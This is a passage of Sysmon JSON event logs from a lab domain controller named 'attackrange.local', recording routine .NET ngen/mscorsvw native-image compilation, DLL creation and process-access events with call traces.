{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6669,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:19.964\r\nProcessGuid: {A837DB8D-047B-5F25-0000-00100CCD0C00}\r\nProcessId: 4460\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\116c-0\\Microsoft.ActiveDirectory.TRLParser.dll\r\nCreationUtcTime: 2020-08-01 05:58:19.964","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:19.964","ProcessGuid":"{A837DB8D-047B-5F25-0000-00100CCD0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\116c-0\\Microsoft.ActiveDirectory.TRLParser.dll","CreationUtcTime":"2020-08-01 05:58:19.964","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6670,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.980\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001011280C00}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.980","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001011280C00}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6671,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.980\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001011280C00}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.980","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001011280C00}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6672,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.980\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0446-5F25-0000-001011280C00}\r\nTargetProcessId: 2596\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.980","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0446-5F25-0000-001011280C00}","TargetProcessId":"2596","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6673,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.011\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.011","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001057D30C00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6674,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.011\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.011","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001057D30C00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6675,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.011\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.011","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001057D30C00}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6676,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:20.027\r\nProcessGuid: {A837DB8D-047C-5F25-0000-001057D30C00}\r\nProcessId: 4604\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11fc-0\\TRLParserCOMInterface.dll\r\nCreationUtcTime: 2020-08-01 05:58:20.027","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:20.027","ProcessGuid":"{A837DB8D-047C-5F25-0000-001057D30C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11fc-0\\TRLParserCOMInterface.dll","CreationUtcTime":"2020-08-01 05:58:20.027","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6677,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.042\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00108AD60C00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.042","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-00108AD60C00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1